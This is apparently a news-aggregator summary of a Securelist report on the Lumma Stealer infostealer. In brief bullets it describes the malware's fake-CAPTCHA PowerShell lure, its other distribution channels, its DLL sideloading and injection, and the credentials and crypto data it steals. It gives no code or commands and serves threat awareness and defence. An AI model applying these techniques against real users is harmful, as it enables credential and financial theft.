A naukri.com initiative
Securelist
4w
431
Image Credit: Securelist
Lumma Stealer – Tracking distribution channels
- Lumma Stealer, introduced in 2022 by the threat actor Lumma, has gained popularity in the cybercriminal underground with prices starting at $250.
- The threat involves human interaction, such as clicking links or running malicious commands, to execute the malware.
- Lumma Stealer uses various distribution methods like phishing emails, trojanized applications, and exploit kits for infection.
- One prominent distribution vector is the fake CAPTCHA scheme that tricks users into executing malicious commands.
- The fake CAPTCHA pages are promoted on pirated media sites, adult content sites, and fake Telegram channels related to cryptocurrencies.
- Users are deceived into clicking buttons that execute PowerShell commands, leading to malware downloads and installations.
- Lumma Stealer employs complex infection techniques like DLL sideloading and injecting payloads into legitimate software to avoid detection.
- The malware steals sensitive data like cryptocurrency credentials, 2FA data, browser credentials, and financial information.
- Communication with command and control servers is disguised as legitimate traffic to exfiltrate stolen data.
- Understanding the infection methods of Lumma Stealer is crucial for developing effective detection and prevention strategies.
Read Full Article
25 Likes
For uninterrupted reading, download the app